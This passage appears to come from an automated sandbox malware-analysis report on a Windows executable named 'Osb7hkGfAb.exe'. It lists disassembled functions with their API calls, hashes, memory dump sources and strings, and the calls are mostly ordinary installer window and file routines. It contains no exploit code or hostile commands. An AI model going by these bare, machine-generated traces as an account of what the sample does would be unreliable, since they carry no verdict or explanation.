                                                                    • Part of subcall function 004049C4: lstrlenA.KERNEL32(0042A890,0042A890,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048DF,000000DF,00000000,00000400,?), ref: 00404A62
                                                                    • Part of subcall function 004049C4: wsprintfA.USER32 ref: 00404A6A
                                                                    • Part of subcall function 004049C4: SetDlgItemTextA.USER32(?,0042A890), ref: 00404A7D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                  • String ID: A$C:\Users\user\tranchet$Call
                                                                  • API String ID: 2624150263-822576286
                                                                  • Opcode ID: 22496922587a79a87c82097af160ec6f00736279c4fa3eb8ac5991cd3654d7e0
                                                                  • Instruction ID: 02b07c61478aeb9ac600f99876a590f4236d4304051c708c1213a6c52027fc1c
                                                                  • Opcode Fuzzy Hash: 22496922587a79a87c82097af160ec6f00736279c4fa3eb8ac5991cd3654d7e0
                                                                  • Instruction Fuzzy Hash: CAA16FB1900209ABDB11EFA6DD45AAF77B8EF84314F14843BF601B62D1DB7C89418B69
                                                                  Function 6FF81A98 Relevance: 20.1, APIs: 13, Instructions: 591stringlibrarymemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 6FF81215: GlobalAlloc.KERNEL32(00000040,6FF81233,?,6FF812CF,-6FF8404B,6FF811AB,-000000A0), ref: 6FF8121D
                                                                  • GlobalAlloc.KERNEL32(00000040,000014A4), ref: 6FF81BC4
                                                                  • lstrcpyA.KERNEL32(00000008,?), ref: 6FF81C0C
                                                                  • lstrcpyA.KERNEL32(00000408,?), ref: 6FF81C16
                                                                  • GlobalFree.KERNEL32(00000000), ref: 6FF81C29
                                                                  • GlobalFree.KERNEL32(?), ref: 6FF81D09
                                                                  • GlobalFree.KERNEL32(?), ref: 6FF81D0E
                                                                  • GlobalFree.KERNEL32(?), ref: 6FF81D13
                                                                  • GlobalFree.KERNEL32(00000000), ref: 6FF81EFA
                                                                  • lstrcpyA.KERNEL32(?,?), ref: 6FF82098
                                                                  • GetModuleHandleA.KERNEL32(00000008), ref: 6FF82114
                                                                  • LoadLibraryA.KERNEL32(00000008), ref: 6FF82125
                                                                  • GetProcAddress.KERNEL32(?,?), ref: 6FF8217E
                                                                  • lstrlenA.KERNEL32(00000408), ref: 6FF82198
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2668548574.000000006FF81000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FF80000, based on PE: true
                                                                  • Associated: 00000000.00000002.2666689682.000000006FF80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2668568921.000000006FF83000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2668596503.000000006FF85000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6ff80000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                  • String ID:
                                                                  • API String ID: 245916457-0
                                                                  • Opcode ID: 1e965431c806b36e34d6afa4413d180d302e7de13ab9f1e0bcad0bbed0f36f7f
                                                                  • Instruction ID: 48bc245fc3b2ede5434c61228294c2d6ce31ed09e411ba076d36c679ec9b608b
                                                                  • Opcode Fuzzy Hash: 1e965431c806b36e34d6afa4413d180d302e7de13ab9f1e0bcad0bbed0f36f7f
                                                                  • Instruction Fuzzy Hash: FA227A7294464ADEDB108FB8C9807EEBBF4FF06315F20472AD1B6E6290DB756681CB50
                                                                  Function 00406945 Relevance: .3, Instructions: 334COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
                                                                  • Instruction ID: f64ed9f862d89b69eb15ddc430260785fe10463149b241517d112065bf602f9e
                                                                  • Opcode Fuzzy Hash: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
                                                                  • Instruction Fuzzy Hash: 57E19BB190070ACFDB24CF59C880BAAB7F5EB45305F15892EE497A7291D378AA51CF14
                                                                  Function 0040711C Relevance: .3, Instructions: 300COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 99f6c7e6b8620be82bccd3d2e3e98bb61de1be8b453b643f323292903d4af905
                                                                  • Instruction ID: 8f207273dfcdbc59f762b6c847d1a58b94b1624b669f9e87ec0d9a9138a8e2bc
                                                                  • Opcode Fuzzy Hash: 99f6c7e6b8620be82bccd3d2e3e98bb61de1be8b453b643f323292903d4af905
                                                                  • Instruction Fuzzy Hash: 0DC15A31E04259CBCF18CF68D4905EEBBB2BF98314F25826AD8567B380D734A942CF95
                                                                  Function 00404B80 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 491windowmemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404B97
                                                                  • GetDlgItem.USER32(?,00000408), ref: 00404BA4
                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404BF3
                                                                  • LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404C0A
                                                                  • SetWindowLongA.USER32(?,000000FC,00405192), ref: 00404C24
                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404C36
                                                                  • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404C4A
                                                                  • SendMessageA.USER32(?,00001109,00000002), ref: 00404C60
                                                                  • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404C6C
                                                                  • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404C7C
                                                                  • DeleteObject.GDI32(00000110), ref: 00404C81
                                                                  • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404CAC
                                                                  • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404CB8
                                                                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D52
                                                                  • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404D82
                                                                    • Part of subcall function 004041B0: SendMessageA.USER32(00000028,?,00000001,00403FE0), ref: 004041BE
                                                                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D96
                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 00404DC4
                                                                  • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404DD2
                                                                  • ShowWindow.USER32(?,00000005), ref: 00404DE2
                                                                  • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404EDD
                                                                  • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404F42
                                                                  • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404F57
                                                                  • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404F7B
                                                                  • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404F9B
                                                                  • ImageList_Destroy.COMCTL32(?), ref: 00404FB0
                                                                  • GlobalFree.KERNEL32(?), ref: 00404FC0
                                                                  • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00405039
                                                                  • SendMessageA.USER32(?,00001102,?,?), ref: 004050E2
                                                                  • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 004050F1
                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 0040511B
                                                                  • ShowWindow.USER32(?,00000000), ref: 00405169
                                                                  • GetDlgItem.USER32(?,000003FE), ref: 00405174
                                                                  • ShowWindow.USER32(00000000), ref: 0040517B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                  • String ID: $M$N
                                                                  • API String ID: 2564846305-813528018
                                                                  • Opcode ID: fdda06af448e6c65fc04a67e7919175d0af5b83356ee1959317fb13923aa2151
                                                                  • Instruction ID: 99b70255f3faedab1c4ad885451b662392dfc0d6b29454a89b749d4faaca394f
                                                                  • Opcode Fuzzy Hash: fdda06af448e6c65fc04a67e7919175d0af5b83356ee1959317fb13923aa2151
                                                                  • Instruction Fuzzy Hash: 5D027DB0A00209AFDB20DF94DD85AAE7BB5FB44354F50813AF610BA2E0D7798D52CF58
                                                                  Function 00403CA7 Relevance: 48.3, APIs: 32, Instructions: 346windowstringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CE3
                                                                  • ShowWindow.USER32(?), ref: 00403D00
                                                                  • DestroyWindow.USER32 ref: 00403D14
                                                                  • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403D30
                                                                  • GetDlgItem.USER32(?,?), ref: 00403D51
                                                                  • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403D65
                                                                  • IsWindowEnabled.USER32(00000000), ref: 00403D6C
                                                                  • GetDlgItem.USER32(?,00000001), ref: 00403E1A
                                                                  • GetDlgItem.USER32(?,00000002), ref: 00403E24
                                                                  • SetClassLongA.USER32(?,000000F2,?), ref: 00403E3E
                                                                  • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403E8F
                                                                  • GetDlgItem.USER32(?,00000003), ref: 00403F35
                                                                  • ShowWindow.USER32(00000000,?), ref: 00403F56
                                                                  • EnableWindow.USER32(?,?), ref: 00403F68
                                                                  • EnableWindow.USER32(?,?), ref: 00403F83
                                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F99
                                                                  • EnableMenuItem.USER32(00000000), ref: 00403FA0
                                                                  • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403FB8
                                                                  • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403FCB
                                                                  • lstrlenA.KERNEL32(0042A890,?,0042A890,00000000), ref: 00403FF5
                                                                  • SetWindowTextA.USER32(?,0042A890), ref: 00404004
                                                                  • ShowWindow.USER32(?,0000000A), ref: 00404138
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                  • String ID:
                                                                  • API String ID: 184305955-0
                                                                  • Opcode ID: f90a3406d0b8a8c4b834731162917c717653151454b1dbe7dd2907c4aa61ec43
                                                                  • Instruction ID: 5e2b37e592d4e435839d8b6e88a40281f914ef55e2ab9fcffeaa2cd4c4a1132c
                                                                  • Opcode Fuzzy Hash: f90a3406d0b8a8c4b834731162917c717653151454b1dbe7dd2907c4aa61ec43
                                                                  • Instruction Fuzzy Hash: 45C1D271600204AFDB21AF62ED88D2B3ABCEB95706F50053EF641B51F0CB799892DB1D
                                                                  Function 004042E6 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 202windowstringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404371
                                                                  • GetDlgItem.USER32(00000000,000003E8), ref: 00404385
                                                                  • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004043A3
                                                                  • GetSysColor.USER32(?), ref: 004043B4
                                                                  • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004043C3
                                                                  • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004043D2
                                                                  • lstrlenA.KERNEL32(?), ref: 004043D5
                                                                  • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004043E4
                                                                  • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004043F9
                                                                  • GetDlgItem.USER32(?,0000040A), ref: 0040445B
                                                                  • SendMessageA.USER32(00000000), ref: 0040445E
                                                                  • GetDlgItem.USER32(?,000003E8), ref: 00404489
                                                                  • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004044C9
                                                                  • LoadCursorA.USER32(00000000,00007F02), ref: 004044D8
                                                                  • SetCursor.USER32(00000000), ref: 004044E1
                                                                  • LoadCursorA.USER32(00000000,00007F00), ref: 004044F7
                                                                  • SetCursor.USER32(00000000), ref: 004044FA
                                                                  • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404526
                                                                  • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040453A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                  • String ID: Call$N
                                                                  • API String ID: 3103080414-3438112850
                                                                  • Opcode ID: 745d5685d33c6010513eb6a6e6710873411dad37f80b0c9191fb1ce11dc8c820
                                                                  • Instruction ID: 2ba0dcbd17e821031ba3c657239c4b48ae58aa12c0a6ed8defdb88479dfe25c9
                                                                  • Opcode Fuzzy Hash: 745d5685d33c6010513eb6a6e6710873411dad37f80b0c9191fb1ce11dc8c820
                                                                  • Instruction Fuzzy Hash: CC61C2B1A00209BFDF10AF61DD45F6A3B69EB94754F00803AFB04BA1D1C7B8A951CF98
                                                                  Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                                  • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                  • DrawTextA.USER32(00000000,datastrrelsers Setup,000000FF,00000010,00000820), ref: 00401156
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                  • String ID: F$datastrrelsers Setup
                                                                  • API String ID: 941294808-580256567
                                                                  • Opcode ID: bb71a3ab4a4fa1f895d534f8b47170c1d9b9c824dc85430c64170ade6c4bb6c2
                                                                  • Instruction ID: fc049dc8deed713fddbaab3278265d12b48f61153473f3c5d5e2d7be2f7e1970
                                                                  • Opcode Fuzzy Hash: bb71a3ab4a4fa1f895d534f8b47170c1d9b9c824dc85430c64170ade6c4bb6c2
                                                                  • Instruction Fuzzy Hash: 33417D71400249AFCF058FA5DE459AFBFB9FF44314F00802AF591AA1A0CB74D955DFA4
                                                                  Function 00405D66 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129memorystringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405EF7,?,?), ref: 00405D97
                                                                  • GetShortPathNameA.KERNEL32(?,0042C620,00000400), ref: 00405DA0
                                                                    • Part of subcall function 00405BF5: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C05
                                                                    • Part of subcall function 00405BF5: lstrlenA.KERNEL32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C37
                                                                  • GetShortPathNameA.KERNEL32(?,0042CA20,00000400), ref: 00405DBD
                                                                  • wsprintfA.USER32 ref: 00405DDB
                                                                  • GetFileSize.KERNEL32(00000000,00000000,0042CA20,C0000000,00000004,0042CA20,?,?,?,?,?), ref: 00405E16
                                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E25
                                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E5D
                                                                  • SetFilePointer.KERNEL32(0040A3D8,00000000,00000000,00000000,00000000,0042C220,00000000,-0000000A,0040A3D8,00000000,[Rename],00000000,00000000,00000000), ref: 00405EB3
                                                                  • GlobalFree.KERNEL32(00000000), ref: 00405EC4
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405ECB
                                                                    • Part of subcall function 00405C90: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\Osb7hkGfAb.exe,80000000,00000003), ref: 00405C94
                                                                    • Part of subcall function 00405C90: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                  • String ID: %s=%s$[Rename]
                                                                  • API String ID: 2171350718-1727408572
                                                                  • Opcode ID: bb326c4fff2569f995f741f5889aaa438d16cb529eb983989e6eb254c782141b
                                                                  • Instruction ID: 2ccb2bf8dd744840d543bbc1a34bde763c5e5f86f0f2c8118c993f85f4779e4e
                                                                  • Opcode Fuzzy Hash: bb326c4fff2569f995f741f5889aaa438d16cb529eb983989e6eb254c782141b
                                                                  • Instruction Fuzzy Hash: 39310531600B15ABC2206B659D48F6B3A5CDF45755F14043BB981F62C2DF7CE9028AFD
                                                                  Function 004063D2 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Osb7hkGfAb.exe",76F93410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040642A
                                                                  • CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406437
                                                                  • CharNextA.USER32(?,"C:\Users\user\Desktop\Osb7hkGfAb.exe",76F93410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040643C
                                                                  • CharPrevA.USER32(?,?,76F93410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040644C
                                                                  Strings
                                                                  • "C:\Users\user\Desktop\Osb7hkGfAb.exe", xrefs: 0040640E
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004063D3
                                                                  • *?|<>/":, xrefs: 0040641A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: Char$Next$Prev
                                                                  • String ID: "C:\Users\user\Desktop\Osb7hkGfAb.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                  • API String ID: 589700163-3358009494
